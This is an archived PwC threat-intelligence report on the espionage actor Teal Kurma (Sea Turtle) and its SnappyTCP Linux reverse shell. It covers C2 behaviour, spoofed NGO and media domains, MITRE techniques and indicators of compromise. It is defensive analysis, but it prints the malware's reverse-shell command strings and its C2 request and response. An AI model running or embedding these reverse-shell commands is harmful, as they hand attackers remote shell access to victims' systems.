{
	"id": "a34b559a-aa3c-4517-a8c9-7d856cd366a0",
	"created_at": "2026-04-06T00:18:18.344963Z",
	"updated_at": "2026-04-10T13:12:56.781503Z",
	"deleted_at": null,
	"sha1_hash": "c99e09523fb2cacb10decce518ca596898376fb4",
	"title": "The Tortoise and The Malwahare",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 337799,
	"plain_text": "The Tortoise and The Malwahare\r\nBy PricewaterhouseCoopers\r\nArchived: 2026-04-05 19:58:39 UTC\r\nThe Author component that should be used here will be made available later\r\nBy PwC Threat Intelligence\r\nRevisiting an elusive espionage threat actor known as Teal Kurma (a.k.a. Sea Turtle) that faded after public\r\ndisclosure over three years ago, by analyzing its malware dubbed 'SnappyTCP', a simple reverse shell for\r\nLinux/Unix systems\r\nExecutive summary\r\nPwC has continued to track a highly capable Türkiye-nexus threat actor threat actor, known as Teal Kurma (a.k.a.\r\nSea Turtle, Marbled Dust, Cosmic Wolf). As reported in our 2020 Year in Retrospect publication, Teal Kurma\r\nfocuses primarily on targeting throughout Europe and the Middle East1. Those targets are inclusive of both private\r\nand public sector organizations, from non-governmental organizations (NGO) to information technology (IT) and\r\ntelecommunication sectors. The threat actor has since continued to target similar sectors but has altered its\r\ncapabilities in a likely attempt to evade detection.\r\nIn this blog, we will detail Linux/Unix malware samples previously not discussed publicly that PwC has named\r\n“SnappyTCP”. 
The following are the key points of our analysis:\r\nhttps://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/tortoise-and-malwahare.html\r\nPage 1 of 14\n\n- Between 2021 and 2023, the threat actor has used SnappyTCP, a simple reverse TCP shell for Linux/Unix\r\nthat has basic C2 capabilities and is also used for establishing persistence on a system;\r\n- There are at least two main variants; one which uses plaintext communication and the other which uses\r\nTLS for a secure connection;\r\n- The threat actor has highly likely used code from a publicly accessible GitHub account, and we assess with\r\nrealistic probability that this account is currently controlled by the threat actor; and,\r\n- Pivoting on infrastructure associated with the threat actor, we identified multiple domains resolving\r\nthroughout 2023 that are spoofing NGOs and Media organizations, both of which are consistent with this\r\nthreat actor's targeting motivations. These motivations center on conducting espionage for the collection of\r\ninformation that can then be exploited for surveillance purposes, or to gather traditional intelligence about\r\nthe activities of specific targets.\r\nBackground\r\nTeal Kurma, a Türkiye-nexus threat actor2, was highly active between 2018 and 2020 before seemingly\r\ndisappearing from open source reporting.3, 4 At the time of this heightened activity, the threat actor was involved\r\nin conducting large scale and prolonged Domain Name System (DNS) hijacking attacks. DNS hijacking is when a\r\nthreat actor manipulates how DNS queries are resolved, resulting in users being redirected to malicious websites.\r\nSince then, Teal Kurma has altered its tactics to include additional tools, which are still in use at present, to\r\nachieve its espionage focused actions on objectives.\r\nSnappyTCP\r\nAccording to open source research, the threat actor has historically focused on exploiting vulnerabilities for initial\r\naccess since at least 20175. 
We assess that Teal Kurma has likely continued leveraging major CVEs in its current\r\ncampaigns, particularly ones with publicly available proof-of-concept code such as CVE-2021-44228, CVE-2021-21974,\r\nand CVE-2022-0847. Once inside a network, the threat actor runs a shell script (upxa.sh) that drops an\r\nexecutable to disk which calls out to a threat actor controlled web server.\r\nSHA-256 f8cb77919f411db6eaeea8f0c8394239ad38222fe15abc024362771f611c360f\r\nFilename upxa.sh\r\nFile type Shell Script\r\nFile size 179 Bytes\r\nThe webshell is a simple reverse TCP shell for Linux/Unix that has basic C2 capabilities, and is also likely used\r\nfor establishing persistence. There are at least two main variants; one which uses OpenSSL to create a secure\r\nconnection over TLS, while the other omits this capability and sends requests in cleartext.\r\nSHA-256 aea947f06ac36c07ae37884abc5b6659d91d52aa99fd7d26bd0e233fd0fe7ad4\r\nFilename _con\r\nFile type ELF\r\nFile size 8,717 Bytes\r\nThe above sample is an example of the non-TLS variant, in which the malware first opens a file named \"conf\",\r\nreads the first 256 bytes into a buffer and then parses an IP address from that buffer. The malware then connects to that IP\r\nover a TCP socket and sends the following request (shown as the format string and arguments used by the binary):\r\nGET /sy.php HTTP/1.1\\r\\nHost: %s\\r\\nHostname: %s\\r\\n\\r\\n\", host_name, host_name \r\nThe domain hosting the mentioned sy.php file was observed on the following URL, as early as July 2021,\r\nhxxp://lo0[.]systemctl[.]network/sy.php. This also happens to be a subdomain mentioned in a 2022 Greek CERT\r\nalert for malicious activity indicating its potential use over a sustained period6. 
Many of the other network\r\nindicators from that CERT alert are assessed to be related to SnappyTCP activity, and proved useful for pivoting\r\non to find more recent infrastructure from 2023, as discussed below.\r\nThe malware then checks for the substring \"X-Auth-43245-S-20\" in the HTTP response, and then checks for\r\n\"\\r\\n\\r\\n\", before spawning the TCP reverse shell. The reverse shell is created using a pthread which launches the\r\nfollowing:\r\nbash -c \\\\\"./kdd_launch exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:%s:%d 2\u003e\u00261\u003e/dev/null\u0026\\\\\"\r\nAn example of what the HTTP network response looks like can be seen in the following data capture output:\r\nUser-Agent: curl/7.29.0\r\nHost: lo0[.]systemctl[.]network\r\nAccept: */*\r\n%HTTP/1.1 200 OK\r\nDate: [Omitted]\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nX-Auth-43245-S-20: True\r\nContent-Length: 45\r\nContent-Type: text/html\r\ncharset=UTF-8\r\ncurl [Threat Actor IP Addresses]\r\npython\r\nTaking a closer look at additional samples, we can see a minor difference from those already mentioned.\r\nSHA-256 1ac0b2e91ba3d33ed6b8cd90f5c1f63454bfdf7aad7dbf4f239445f31dfc6eb5\r\nFilename [bioset]\r\nFile type ELF\r\nFile size 14,584 Bytes\r\nIn the other samples, which use OpenSSL and TLS certificates for a more secure connection, the malware\r\nconnects to an IP parsed from the conf file and sends:\r\nGET /ssl.php HTTP/1.1\\\\r\\\\nHost: %s\\\\r\\\\nHostname: %s\\\\r\\\\nConnection: close\\\\r\\\\n\\\\r\\\\n\r\nIn a similar fashion to previous samples, it spawns a pthread that calls bash and runs an executable, except this\r\ntime it calls a different one named ‘update’ compared to the previous ‘kdd_launch’:\r\nbash -c \\\\\"./update exec:'bash -li',pty,stderr,setsid,sigint,sane 
OPENSSL:%s:%d,verify=0\r\n2\u003e\u00261\u003e/dev/null\u0026\\\\\"\r\nAdditional malware insights\r\nWe observed that the SnappyTCP binaries are often compiled with different toolchains, as shown in\r\nTable 1. Additionally, the GNU C Library (GLIBC) has been observed statically linked into the binary, which\r\nlets the malware developer keep everything self-contained without needing to link against the shared\r\nlibrary files present on the target machine. The build output also differed, with some samples produced as\r\nexecutables and others as shared object files.\r\nMD5 | Executable or Shared Object | Architecture Type | Operating System | Version\r\n102d8524f21d1b6b0380c817a435e9a7 | DYN | AMD64-64 | Debian | 10.2.1-6\r\n80aa20453ca295467bff3f8708a06280 | DYN | 64-64 | Debian | 10.2.1-6\r\n122b56b4474f93d496dee79d939c58f4 | EXEC | 386-32 | Red Hat | 4.1.2-52\r\n2a684c83401ec4706f81bf4a3503e096 | EXEC | 386-32 | Red Hat | 4.8.5-39\r\n19021c37d8adda5fa509dd242629cd50 | EXEC | AMD64-64 | Red Hat | 4.8.5-39\r\n8640f22e5a859ea2216d0e9dacef4f50 | EXEC | AMD64-64 | Red Hat | 4.4.7-23\r\nTable 1 – Overview of build artifacts for several SnappyTCP samples\r\nSince ELF files do not record a compilation date, we could not link the variations in toolchain (e.g.,\r\narchitecture types, operating systems, etc.) usage to an evolution of the malware over time. There are at least two\r\npossible reasons for the variations, which are not necessarily mutually exclusive. One potential theory for the wide\r\nvariation in toolchains is that there are multiple developers compiling malware for the threat actor. The second\r\ntheory is that the samples are compiled by one developer, but they are cross-compiling source code for different\r\narchitectures. 
The first theory could speak to the scale of operations, while the second theory lends more towards\r\nthe threat actor's specific targeting needs.\r\nIn our analysis we also discovered that the reverse TCP shell has practically identical code to a publicly accessible\r\nGitHub repository7. The code observed on GitHub has only one slight difference in the TLS variant seen with Teal\r\nKurma. The executable called by the pthread that spawns a bash process in Teal Kurma’s sample is called ‘update’\r\ninstead of ‘connector’ as seen in the GitHub repository.\r\nFurther observations show other samples in the repository that are used to establish reverse shells, either over TCP\r\nor UDP, often containing IP addresses suspected of being associated with Teal Kurma activity. It is unclear if the\r\nthreat actor controls this account or is simply abusing a third party's code. Given the overlaps between both the\r\ncode and IP addresses, there is a realistic probability that the threat actor is in control of this account at present. It\r\nis highly plausible that the threat actor is also using other code observed on this GitHub account, particularly some of the\r\nproof-of-concept exploit code for major vulnerabilities, such as CVE-2021-21974 or an ESXi OpenSLP heap-overflow vulnerability.\r\nInfrastructure\r\nIn addition to analyzing the mentioned samples, we pivoted on the HTTP GET request of SnappyTCP and the\r\npreviously mentioned open source reporting on Sea Turtle, including the 2022 Greek CERT alert, to find more\r\nsuspected Teal Kurma infrastructure. For example, one of the observed HTTP GET requests matched with\r\nhxxp://108.61.103[.]186/sy.php. Pivoting on the 2022 CERT infrastructure also proved useful in identifying\r\nadditional and recent infrastructure, such as the domain ybcd[.]tech. 
According to pDNS records for that domain,\r\nthe following infrastructure is linked and still active at the time of writing: 168.100.10[.]187 and 93.115.22[.]212.\r\nFigure 1 – Some of the pivots made to identify additional and more recent infrastructure\r\nAs we continued to map out this infrastructure, we noticed several suspicious TLS certificates and associated\r\nnames which correspond to domains spoofing very particular organizations. The table below shows that the\r\ndomain names spoof organizations operating in both the Media and NGO sectors, all of which cater to\r\naudiences within the Middle East and, in some cases, specific regional or ethnic groups.\r\nCertificate | IP | Domain | Spoofing\r\nb7342137986f24f4d848409d223ad8db38366e90f8ba865fb6e090ca20c6318a | 168.100.8[.]245 | alhurra[.]online | A US government-owned Arabic-language TV channel\r\ncbf4263d62c199cd6c0ff39dcb07b4970975ca75a16d1eae1fccdccc44f9dc98 | 168.100.9[.]203 | al-marsad[.]co | An NGO in the Golan Heights that is focused on Arab human rights\r\ne3a58bc8891b2ed3b6bf8ce415d169bf963e039be165ba3dcdd2a73c6c342456 | 31.13.195[.]52 | anfturkce[.]news | A Kurdish news agency\r\nTable 2 – Suspicious TLS certificates observed via pivoting\r\nMotives and Targets\r\nThe motivation for this threat actor is almost certainly to collect information that can further some type of\r\neconomic or political interest, but the focus is on conducting espionage.8 The use of the described reverse shell is\r\nto assist the threat actor in its overall actions on objectives of collecting and exfiltrating sensitive data. A closer\r\nlook at victimology helps to assess the type of data sets this threat actor is interested in.\r\nThe threat actor focuses on targeting governments, telecommunication, and IT service providers. 
Each one of\r\nthese sectors holds a variety of high value information. For example, organizations in the telecommunication sector\r\nhold data on their customers, which, depending on the provider, may be metadata around connections to websites or\r\ncall logs. Technology companies themselves may be targeted in supply chain and island hopping attacks,\r\nparticularly where they provide services (including IT and cyber security) to customers. This kind of information\r\ncan then be exploited by the threat actor for surveillance purposes, or to gather traditional intelligence about the\r\nactivities of specific targets.\r\nAdditional sector targeting that aligns with such purposes includes the NGO and Media \u0026 Entertainment sectors,\r\nboth of which this threat actor has also shown an interest in, according to the mentioned TLS certificates.\r\nGeographically, the targeting assessed from the TLS certificates points to the Middle East and North Africa region,\r\nwhile some of the SnappyTCP activity is highly likely focused on European countries, particularly those located in\r\nthe Mediterranean. This described targeting helps support attribution of the threat actor, in addition to providing\r\ninsights into its priority relevance for organizations that might be operating in a similar geography or sector.\r\nRecommendations\r\nPwC recommends searching historical logs and configuring alerting for the indicators or detection content\r\nprovided in this blog. If any of these indicators are discovered, or detection content generates alerts, we\r\nrecommend organisations investigate their origin and conduct forensic analysis. 
If there are no significant\r\nfindings, we recommend blocking the provided malicious indicators.\r\nOverview of TTPs\r\nMore detailed information on each of the techniques used in this blog, along with detection and mitigations, can\r\nbe found on the following MITRE pages:\r\nTactic | Technique | ID | Procedure\r\nExecution | Command and Scripting Interpreter: Unix Shell | T1059.004 | SnappyTCP uses a Unix shell (e.g., bash) as a command interpreter, as seen here: “-c \\\\\"./kdd_launch exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:%s:%d 2\u003e\u00261\u003e/dev/null\u0026\\\\\"”\r\nPersistence | Server Software Component: Web Shell | T1505.003 | SnappyTCP is a reverse web shell that establishes persistence on a system.\r\nCommand and Control | Application Layer Protocol: Web Protocols | T1071.001 | SnappyTCP uses HTTP as part of its GET requests for command and control communications.\r\nCommand and Control | Non-Application Layer Protocol | T1095 | SnappyTCP uses TCP for command and control communications.\r\nAppendix A – Indicators of compromise\r\nIndicator Type\r\naea947f06ac36c07ae37884abc5b6659d91d52aa99fd7d26bd0e233fd0fe7ad4 SHA-256\r\nae89540cdfb11b0c9ebda8cfdf8f5e27ba8b729c46abc395a0e1e8bb99b00c54 SHA-256\r\nfb02a6ca9d4f80ba9832ca22eec4d58233929ad952805030fd9da276714dabca SHA-256\r\nd0a7d18e283f80d456ab57fe4d986ef1f020f9c3293ae640b7d8976a694c1757 SHA-256\r\n984f3e8af0c59cfa918319e3b813d75be4277a9765201bd14a9be9ee6b008d34 SHA-256\r\n86b13a1058dd7f41742dfb192252ac9449724c5c0a675c031602bd9f36dd49b5 SHA-256\r\n77a2466a89ed1d83c700d313395c4d10345d6d7f3e1fd294c6eb111b218422a3 SHA-256\r\n6b8a6c28f7a8df5e226ce853230bb667316e2eae136e64edd6e44f5648683f11 
SHA-256\r\n67647f0226e29ada304e476d4e9d35b4ac916c584b1768eb5127bd0df1818707 SHA-256\r\n6650c6971d6e7927efad09b215426a442c6342dd22f073972021d8e81a3ba124 SHA-256\r\n47c4e2c71e5caa2e0aeb3ed7a3f0d2c482c6acc19e82bac5d7821aa6ef9e735a SHA-256\r\n405b2c867408f4dc6583109cbc21bac0e78f2f0e6c45013d1c9811a6f0b99a81 SHA-256\r\n3c9e4ba1278b751c24f03ba39cb317b1bc51d2dc5173b0a0b201bc62fdc2c6fd SHA-256\r\n1695a1adb142d4da4830654c72796fc33d1e8ab9af03de85b7d6ef3e959985ab SHA-256\r\n15528410418d246a085044c67f431397d159d64003f13145b68287e7a68e805a SHA-256\r\n29f82ca8b268b1b74e22e05ef85e64cf7cf96751e494a07fe8ef96046e39dc26 SHA-256\r\n293703318fab4ad56124d37e6c93d1aecbce4c656782c40fce5d67f3b4149558 SHA-256\r\n276b1cecbd4ab24bbd47c23558143bdf905440c7045a7ff46a49d80b341c2cd5 SHA-256\r\n30eb5c522a29a1aad4c55cccadcbfd335beed648904f13b25379f23536404803 SHA-256\r\n1ac0b2e91ba3d33ed6b8cd90f5c1f63454bfdf7aad7dbf4f239445f31dfc6eb5 SHA-256\r\nddcc23f81362bb394e0ee66fda549a1523860b3b SHA1\r\nda64b83c2998212bbf77862e17d3564a0745f222 SHA1\r\nd4ca42e06e5803a5c3bf35c52c0a7b9408356ac3 SHA1\r\nc8d8a7bfe27be6087685495726593d7f6168e94c SHA1\r\nc418180c7233233364bb223a2ba621b167bfb503 SHA1\r\nc17928c00a9dad1a6455eaa490355dd311f6d88f SHA1\r\nbce355f628fcd7aec82a2f33e8af3bd87b6a33d8 SHA1\r\nae78ba9e5dad29ac910996a0c5d34684cedfe3f7 SHA1\r\n9c3f19a8a0824fc9745b5b8dd86f660a1e186d52 SHA1\r\n922bab717a9b21dc3510ba96e0c3e4a93296e934 SHA1\r\n87f4775c29b47617c0fefa984bb342a79c0ba02d SHA1\r\n700d2c7e00df8249e61ccda1fcf6f1f235dc6d23 SHA1\r\n826fe3ed0a75f5c7f093451e11588d07ff90ac81 SHA1\r\n7f8ed51d632738e3523a94ba5f94b997e922e9fe SHA1\r\n450431fd6561ea4cbb853762163f7a1544d562b8 SHA1\r\n3a5fe689d7f0ee374b1ef0b9227aecae56925e84 SHA1\r\n6557106402d71958aac007940a6cdd934e0b2336 SHA1\r\n6487e320b6294669604a61866b29ce78c3f34e69 SHA1\r\n600a3f64a619db97457231b2e654d5b4a794d2f8 SHA1\r\n514e02418468dfcad702b0e0be22fb8f9a5366bc SHA1\r\nd036adb864e46ad88dd2c1dbca62137a MD5\r\nc7e99654250bf4e3286c3ea7547a62fe MD5\r\n9ac96799b2b7a376c7a7fc3c76322556 MD5\r\n9a56d56aa24ccc75ef5709747ec5ca8b MD5\r\nbb7cd2dc1dd3bcd6932a6e75a1c95afe MD5\r\nf17985bdc165388476dd228eb927d632 MD5\r\ne69541dd97e4d4abfa33d5d4907412c6 MD5\r\ne3e4b90f9ebe829ab323e68139becf0c MD5\r\nd2a8ec0f0c4f2f015830788cec54c67f MD5\r\n4b8ac8f2d517cd9836a2578cae47fe8d MD5\r\n6f20fdd1fd6c133ef575bd36437578cf MD5\r\n2352627014f80918dde97aad963c5cf2 MD5\r\n2a684c83401ec4706f81bf4a3503e096 MD5\r\n19021c37d8adda5fa509dd242629cd50 MD5\r\n122b56b4474f93d496dee79d939c58f4 MD5\r\n102d8524f21d1b6b0380c817a435e9a7 MD5\r\n8e08c7c440bf9f5380dd614238fa2d38 MD5\r\n80aa20453ca295467bff3f8708a06280 MD5\r\n7d0d50de5aa34f7a0e8cffe06f50a5fb MD5\r\n8640f22e5a859ea2216d0e9dacef4f50 MD5\r\n168.100.10[.]187 IPv4\r\n93.115.22[.]212 IPv4\r\n108.61.103[.]186 IPv4\r\n168.100.8[.]245 IPv4\r\n168.100.9[.]203 IPv4\r\n31.13.195[.]52 IPv4\r\n45.80.148[.]172 IPv4\r\n31.214.157[.]230 IPv4\r\n95.179.176[.]250 IPv4\r\n199.247.29[.]25 IPv4\r\n185.158.248[.]8 IPv4\r\n88.119.171[.]248 IPv4\r\n146.190.28[.]83 IPv4\r\nalhurra[.]online Domain\r\nal-marsad[.]co Domain\r\nanfturkce[.]news Domain\r\nybcd[.]tech Domain\r\nud[.]ybcd[.]tech Domain\r\nsystemctl[.]network Domain\r\nlo0[.]systemctl[.]network Domain\r\neth0[.]secrsys[.]net Domain\r\naws[.]systemctl[.]network Domain\r\ndhcp[.]systemctl[.]network Domain\r\nnmcbcd[.]live Domain\r\nquerryfiles[.]com 
Domain\r\nupt[.]mcsoft[.]org Domain\r\nhxxp://108.61.103[.]186/sy.php URL\r\nhxxp://lo0[.]systemctl[.]network/sy.php URL\r\n1 PwC Cyber Threats 2020: A Year in Retrospect\r\n2 'Exclusive: Hackers acting in Turkey’s interests believed to be behind recent cyberattacks - sources', Reuters,\r\nhttps://www.reuters.com/article/us-cyber-attack-hijack-exclusive-idUSKBN1ZQ10X/ (27th January 2020)\r\n3 'DNS Hijacking Abuses Trust In Core Internet Service', Cisco Talos, https://blog.talosintelligence.com/seaturtle/ (17th April 2019)\r\n4 'Finding Additional Indicators With a SeaTurtle Deep Dive in Passive DNS Within DomainTools Iris’, DomainTools,\r\nhttps://www.domaintools.com/resources/blog/finding-additional-indicators-with-passive-dns-within-domaintools-iris/ (6th February\r\n2020)\r\n5 'DNS Hijacking Abuses Trust In Core Internet Service', Cisco Talos, https://blog.talosintelligence.com/seaturtle/ (17th April 2019)\r\n6 'kyvernoasfaleia-IOCs-11052022', Greek National CERT (May 2022)\r\n7 hxxps://github[.]com/jacksp7/webtest/blob/master\r\n8 CTO-SIB-20200323-01-A – Furthering Turkish state interests through cyber operations\r\nSource: https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/tortoise-and-malwahare.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA",
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/tortoise-and-malwahare.html"
	],
	"report_names": [
		"tortoise-and-malwahare.html"
	],
	"threat_actors": [
		{
			"id": "cfdd35af-bd12-4c03-8737-08fca638346d",
			"created_at": "2022-10-25T16:07:24.165595Z",
			"updated_at": "2026-04-10T02:00:04.887031Z",
			"deleted_at": null,
			"main_name": "Sea Turtle",
			"aliases": [
				"Cosmic Wolf",
				"Marbled Dust",
				"Silicon",
				"Teal Kurma",
				"UNC1326"
			],
			"source_name": "ETDA:Sea Turtle",
			"tools": [
				"Drupalgeddon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "33ae2a40-02cd-4dba-8461-d0a50e75578b",
			"created_at": "2023-01-06T13:46:38.947314Z",
			"updated_at": "2026-04-10T02:00:03.155091Z",
			"deleted_at": null,
			"main_name": "Sea Turtle",
			"aliases": [
				"UNC1326",
				"COSMIC WOLF",
				"Marbled Dust",
				"SILICON",
				"Teal Kurma"
			],
			"source_name": "MISPGALAXY:Sea Turtle",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "62b1b01f-168d-42db-afa1-29d794abc25f",
			"created_at": "2025-04-23T02:00:55.22426Z",
			"updated_at": "2026-04-10T02:00:05.358041Z",
			"deleted_at": null,
			"main_name": "Sea Turtle",
			"aliases": [
				"Sea Turtle",
				"Teal Kurma",
				"Marbled Dust",
				"Cosmic Wolf",
				"SILICON"
			],
			"source_name": "MITRE:Sea Turtle",
			"tools": [
				"SnappyTCP"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434698,
	"ts_updated_at": 1775826776,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c99e09523fb2cacb10decce518ca596898376fb4.pdf",
		"text": "https://archive.orkl.eu/c99e09523fb2cacb10decce518ca596898376fb4.txt",
		"img": "https://archive.orkl.eu/c99e09523fb2cacb10decce518ca596898376fb4.jpg"
	}
}